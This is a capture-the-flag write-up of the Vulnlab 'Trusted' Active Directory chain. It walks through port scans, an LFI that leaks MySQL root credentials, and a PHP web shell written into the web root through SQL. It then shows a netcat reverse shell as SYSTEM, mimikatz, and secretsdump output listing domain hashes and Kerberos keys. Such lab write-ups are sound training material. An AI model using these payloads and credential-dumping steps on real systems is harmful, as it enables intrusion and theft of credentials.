Trusted - wook413

#vulnlab #easy #activedirectory #chains # Information Gathering - Nmap As always, I began with scanning all TCP ports. Since it's a `AD Chain` that consists of 2 targets, I'll scan one by one. `machine1` ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap $machine1 -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 00:14 UTC Nmap scan report for 10.10.158.197 Host is up (0.16s latency). Not shown: 65509 closed tcp ports (reset) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 9389/tcp open adws 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49672/tcp open unknown 49677/tcp open unknown 49678/tcp open unknown 49687/tcp open unknown 53930/tcp open unknown 61754/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 23.43 seconds ``` Then I performed a more detailed TCP scan against those ports I discovered ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap $machine1 -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,47001,49664,49665,49666,49667,49668,49672,49677,49678,49687,53930,61754 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 00:17 UTC Nmap scan report for 10.10.158.197 Host is up (0.17s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-02 00:17:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2025-10-02T00:18:24+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=trusteddc.trusted.vl | Not valid before: 2025-10-01T00:10:48 |_Not valid after: 2026-04-02T00:10:48 | rdp-ntlm-info: | Target_Name: TRUSTED | NetBIOS_Domain_Name: TRUSTED | NetBIOS_Computer_Name: TRUSTEDDC | DNS_Domain_Name: trusted.vl | DNS_Computer_Name: trusteddc.trusted.vl | Product_Version: 10.0.20348 |_ System_Time: 2025-10-02T00:18:16+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49672/tcp open msrpc Microsoft Windows RPC 49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc Microsoft Windows RPC 49687/tcp open msrpc Microsoft Windows RPC 53930/tcp open msrpc Microsoft Windows RPC 61754/tcp open msrpc Microsoft Windows RPC Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-10-02T00:18:17 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 78.38 seconds ``` A UDP scan ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap $machine1 -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 00:19 UTC Nmap scan report for 10.10.158.197 Host is up (0.17s latency). PORT STATE SERVICE 53/udp open domain 67/udp closed dhcps 123/udp open ntp 135/udp closed msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 8.64 seconds ``` Now moving on to `machine2`. I'm repeating exactly the same steps. ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap $machine2 -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 00:19 UTC Nmap scan report for 10.10.158.198 Host is up (0.16s latency). Not shown: 65267 closed tcp ports (reset), 238 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 443/tcp open https 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3306/tcp open mysql 3389/tcp open ms-wbt-server 5985/tcp open wsman 9389/tcp open adws 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49672/tcp open unknown 49677/tcp open unknown 49678/tcp open unknown 49685/tcp open unknown 50334/tcp open unknown 58448/tcp open unknown 60196/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 25.56 seconds ``` ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap $machine2 -sC -sV -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,3306,3389,5985,9389,47001,49664,49665,49666,49667,49668,49672,49677,49678,49685,50334,58448,60196 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 00:21 UTC Nmap scan report for 10.10.158.198 Host is up (0.16s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6) | http-title: Welcome to XAMPP |_Requested resource was http://10.10.158.198/dashboard/ |_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-02 00:21:28Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6) | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time | http-title: Welcome to XAMPP |_Requested resource was https://10.10.158.198/dashboard/ |_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3306/tcp open mysql MariaDB 5.5.5-10.4.24 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.4.24-MariaDB | Thread ID: 9 | Capabilities flags: 63486 | Some Capabilities: IgnoreSigpipes, Speaks41ProtocolOld, SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, ODBCClient, FoundRows, DontAllowDatabaseTableColumn, Support41Auth, Speaks41ProtocolNew, SupportsCompression, IgnoreSpaceBeforeParenthesis, LongColumnFlag, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults | Status: Autocommit | Salt: FL.=+[m0FN5]X~6/'v@w |_ Auth Plugin Name: mysql_native_password 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=labdc.lab.trusted.vl | Not valid before: 2025-10-01T00:10:49 |_Not valid after: 2026-04-02T00:10:49 |_ssl-date: 2025-10-02T00:22:34+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: LAB | NetBIOS_Domain_Name: LAB | NetBIOS_Computer_Name: LABDC | DNS_Domain_Name: lab.trusted.vl | DNS_Computer_Name: labdc.lab.trusted.vl | DNS_Tree_Name: trusted.vl | Product_Version: 10.0.20348 |_ System_Time: 2025-10-02T00:22:25+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49672/tcp open msrpc Microsoft Windows RPC 49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc Microsoft Windows RPC 49685/tcp open msrpc Microsoft Windows RPC 50334/tcp open msrpc Microsoft Windows RPC 58448/tcp open msrpc Microsoft Windows RPC 60196/tcp open msrpc Microsoft Windows RPC Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-10-02T00:22:28 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.63 seconds ``` ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap $machine2 -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 00:25 UTC Nmap scan report for 10.10.158.198 Host is up (0.17s latency). PORT STATE SERVICE 53/udp open domain 67/udp closed dhcps 123/udp open ntp 135/udp closed msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp open|filtered ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds ``` --- # Enumeration ## machine1 Both machines appear to be Domain Controllers. I mapped their domain names with the IP in the `/etc/hosts` file. ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ echo '10.10.158.197 trusted trusted.vl trusteddc.trusted.vl' | sudo tee -a /etc/hosts 10.10.158.197 trusted trusted.vl trusteddc.trusted.vl ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ echo '10.10.158.198 lab lab.trusted.vl labdc.lab.trusted.vl' | sudo tee -a /etc/hosts 10.10.158.198 lab lab.trusted.vl labdc.lab.trusted.vl ``` `rpcclient` and `smbclient` both failed for machine1 ```bash ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ rpcclient -U "" -N $machine1 rpcclient gt; enumdomusers result was NT_STATUS_ACCESS_DENIED ``` ## machine2 `smbclient` and `rpcclient` also failed for machine 2. ##### HTTP&HTTPS - 80&443 ![[Pasted image 20251001194029.png]] `phpinfo` tab is available and it tells us a lot of information about the running PHP service. There are no `disable_functions` and its `document_root` is `C:/xampp/htdocs`, and etc ![[Pasted image 20251001194117.png]] ![[Pasted image 20251001194235.png]] `gobuster` revealed some directories to explore including `/dev`, which is hosting what appears to be a website for a law firm called `Manes Winchester`. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://$machine2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.158.198/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 336] [--> http://10.10.158.198/img/] /dev (Status: 301) [Size: 336] [--> http://10.10.158.198/dev/] /examples (Status: 503) [Size: 402] /licenses (Status: 403) [Size: 421] /dashboard (Status: 301) [Size: 342] [--> http://10.10.158.198/dashboard/] /%20 (Status: 403) [Size: 302] /IMG (Status: 301) [Size: 336] [--> http://10.10.158.198/IMG/] /*checkout* (Status: 403) [Size: 302] /Img (Status: 301) [Size: 336] [--> http://10.10.158.198/Img/] /phpmyadmin (Status: 403) [Size: 302] /webalizer (Status: 403) [Size: 302] /*docroot* (Status: 403) [Size: 302] /* (Status: 403) [Size: 302] /con (Status: 403) [Size: 302] /Dashboard (Status: 301) [Size: 342] [--> http://10.10.158.198/Dashboard/] ``` ![[Pasted image 20251001194310.png]] I clicked on `ABOUT` tab to navigate but the changed URL address seems like it might be a LFI attack vector. ![[Pasted image 20251001195107.png]] Also at the bottom of the page, it says the person is trying to implement some PHP code and set up the db connection but failed. ![[Pasted image 20251001201441.png]] Looks like it is indeed vulnerable to LFI. ![[Pasted image 20251001195503.png]] Fuzzing further for `.php` files I found `db.php` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://$machine2/dev/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html,pdf =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.158.198/dev/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt,html,pdf [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.html (Status: 403) [Size: 302] /images (Status: 301) [Size: 343] [--> http://10.10.158.198/dev/images/] /index.html (Status: 200) [Size: 2311] /contact.html (Status: 200) [Size: 1967] /about.html (Status: 200) [Size: 1177] /Images (Status: 301) [Size: 343] [--> http://10.10.158.198/dev/Images/] /css (Status: 301) [Size: 340] [--> http://10.10.158.198/dev/css/] /Contact.html (Status: 200) [Size: 1967] /About.html (Status: 200) [Size: 1177] /Index.html (Status: 200) [Size: 2311] /db.php (Status: 200) [Size: 22] ``` it says `connected successfully` when I included `db.php` ![[Pasted image 20251001202537.png]] I tried to read `db.php` again with base64 filter ![[Pasted image 20251001202843.png]] Decoding the output revealed a set of credentials! `root:SuperSecureMySQLPassw0rd1337.` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo 'PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4' | base64 -d <?php $servername = "localhost"; $username = "root"; $password = "SuperSecureMySQLPassw0rd1337."; $conn = mysqli_connect($servername, $username, $password); if (!$conn) { die("Connection failed: " . mysqli_connect_error()); } echo "Connected successfully"; ?> ``` successfully logged into `mysql` client ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ mysql -h $machine2 -u 'root' -p --skip-ssl Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 34 Server version: 10.4.24-MariaDB mariadb.org binary distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> ``` ```bash MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | news | | performance_schema | | phpmyadmin | | test | +--------------------+ MariaDB [phpmyadmin]> use news; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [news]> show tables; +----------------+ | Tables_in_news | +----------------+ | users | +----------------+ 1 row in set (0.174 sec) MariaDB [news]> select * from users; +----+------------+--------------+-----------+----------------------------------+ | id | first_name | short_handle | last_name | password | +----+------------+--------------+-----------+----------------------------------+ | 1 | Robert | rsmith | Smith | 7e7abb54bbef42f0fbfa3007b368def7 | | 2 | Eric | ewalters | Walters | d6e81aeb4df9325b502a02f11043e0ad | | 3 | Christine | cpowers | Powers | e3d3eb0f46fe5d75eed8d11d54045a60 | +----+------------+--------------+-----------+----------------------------------+ 3 rows in set (0.172 sec) ``` `Crackstation.net` was able to crack one of the hashes. ![[Pasted image 20251001204522.png]] Let's test `rsmith:IHateEric2` credentials set. ![[Pasted image 20251001204651.png]] After I verified it, I found more users using `--rid-brute` option ![[Pasted image 20251001204741.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat users2.txt Administrator Guest krbtgt LABDC$ TRUSTED$ rsmith ewalters cpowers ``` I confirmed those users do exist in the domain with `kerbrute` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ /opt/kerbrute_linux_amd64 userenum --dc $machine2 --domain lab users2.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 10/02/25 - Ronnie Flathers @ropnop 2025/10/02 01:52:17 > Using KDC(s): 2025/10/02 01:52:17 > 10.10.158.198:88 2025/10/02 01:52:18 > [+] VALID USERNAME: Administrator@lab 2025/10/02 01:52:18 > [+] VALID USERNAME: TRUSTED$@lab 2025/10/02 01:52:18 > [+] VALID USERNAME: LABDC$@lab 2025/10/02 01:52:18 > [+] VALID USERNAME: cpowers@lab 2025/10/02 01:52:18 > [+] VALID USERNAME: ewalters@lab 2025/10/02 01:52:18 > [+] VALID USERNAME: rsmith@lab 2025/10/02 01:52:18 > Done! Tested 8 usernames (6 valid) in 0.174 seconds ``` # Initial Access - shell as `SYSTEM` I came back to `mysql` client thinking I can actually perform RCE directly if I could write a file in the web root directory. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ mysql -h $machine2 -u 'root' -p --skip-ssl Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 35 Server version: 10.4.24-MariaDB mariadb.org binary distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> select '<?php system($_REQUEST["cmd"]); ?>' into outfile 'C:/xampp/htdocs/dev/shell.php'; Query OK, 1 row affected (0.165 sec) ``` ![[Pasted image 20251001211839.png]] downloaded `nc.exe` from my kali to the target machine. ![[Pasted image 20251001212259.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.8.7.140] from (UNKNOWN) [10.10.158.198] 61938 Microsoft Windows [Version 10.0.20348.887] (c) Microsoft Corporation. All rights reserved. C:\xampp\htdocs\dev>whoami whoami nt authority\system ``` Found `user.txt` ```bash C:\Users\Administrator\Desktop>type User.txt type User.txt VL{349efd4b1ccbeb4d3ca0108fa5cc5802} ``` ```bash 931e38d351d18adccd80a9a6806eaaa6 ``` Downloaded `mimikatz` onto the target machine to dump all the creds ![[Pasted image 20251001215056.png]] With the machine hash, we can remote dump all other hashes ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-secretsdump '[email protected]' -hashes :931e38d351d18adccd80a9a6806eaaa6 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd::: lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd::: lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a::: lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43::: LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:931e38d351d18adccd80a9a6806eaaa6::: TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:772aabbafa450f0e099cd4d5012c8f5d::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:ef0dd1293ef26fdcb054dfecd324e272037f8af708bd2d6289d4010075605eb3 Administrator:aes128-cts-hmac-sha1-96:8487e135528f40d60c99a45b071bbf86 Administrator:des-cbc-md5:b64aef752657b3c8 krbtgt:aes256-cts-hmac-sha1-96:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa krbtgt:aes128-cts-hmac-sha1-96:db0b41cedf222df3808858fc41bb0c02 krbtgt:des-cbc-md5:0e89167916c134ad lab.trusted.vl\rsmith:aes256-cts-hmac-sha1-96:b1dd0c20df2dc7638ded51d85ba03682ea308444b4121a10b8e4fa3c24872a41 lab.trusted.vl\rsmith:aes128-cts-hmac-sha1-96:631ba36ba1aaf36135ba4b382dd41590 lab.trusted.vl\rsmith:des-cbc-md5:ae892f45c12fbc5e lab.trusted.vl\ewalters:aes256-cts-hmac-sha1-96:6408f007a75c725b882a69e6cf22a2218f7ac4d6ddce9f4fb109ae5690472b90 lab.trusted.vl\ewalters:aes128-cts-hmac-sha1-96:bcc44f6ca3403c468757c8cd470d4eb3 lab.trusted.vl\ewalters:des-cbc-md5:86617f4046586410 lab.trusted.vl\cpowers:aes256-cts-hmac-sha1-96:cfd7dce3d0c1a17ae08fc653769ddd382b116b3708197f5d251764dab318d39e lab.trusted.vl\cpowers:aes128-cts-hmac-sha1-96:413bcdb4a908e53f133a9c660006c0b9 lab.trusted.vl\cpowers:des-cbc-md5:32ab807a018ac89d LABDC$:aes256-cts-hmac-sha1-96:cd4b3d53e7cbbd58db8920da81b2883ce0e4a3da8ad4a7df28c8f8d0833bba62 LABDC$:aes128-cts-hmac-sha1-96:35eda37c5b8340459c042fafc07d579a LABDC$:des-cbc-md5:62ba2c9ed0c164f1 TRUSTED$:aes256-cts-hmac-sha1-96:2d386c5c5091919b0487065fa5ab33afec59127d90c9554605093dd08995c70f TRUSTED$:aes128-cts-hmac-sha1-96:0529f4d2d7138df9c92e495c128b7b95 TRUSTED$:des-cbc-md5:16295ef88a028fc4 [*] Cleaning up... ```